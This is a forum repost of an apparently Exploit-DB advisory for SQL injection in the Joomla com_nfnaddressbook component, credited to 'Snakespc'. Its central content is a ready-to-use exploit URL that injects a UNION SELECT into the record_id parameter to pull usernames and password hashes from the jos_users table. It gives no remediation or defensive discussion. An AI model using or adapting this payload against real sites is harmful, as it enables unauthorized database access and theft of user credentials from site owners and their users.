Jump to content
romanu

Joomla com_nfnaddressbook Remote Sql Injection Vulnerability

Recommended Posts

Posted

# Title: Joomla com_nfnaddressbook Remote Sql Injection Vulnerability

# EDB-ID: 11730

# CVE-ID: ()

# OSVDB-ID: ()

# Author: Snakespc

# Published: 2010-03-14

# Verified: no

# Download Exploit Code

# Download N/A

view sourceprint?==============================================================================

[»] Joomla com_nfnaddressbook Remote Sql Injection Vulnerability

==============================================================================

[»] Script: [Joomla]

[»] Language: [ PHP ]

[»] Founder: [ Snakespc Email:super_crist4l@hotmail.com - Site:sec-war.com/cc> ]

[»] Greetz to:[ DrEadFul, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]

###########################################################################

===[ Exploit ]===

[»] http://localhost/joomla/index.php?option=com_nfnaddressbook&Itemid=61&action=viewrecord&record_id=-4+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_users--

[»]Author: DrEadFul<-

###########################################################################

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...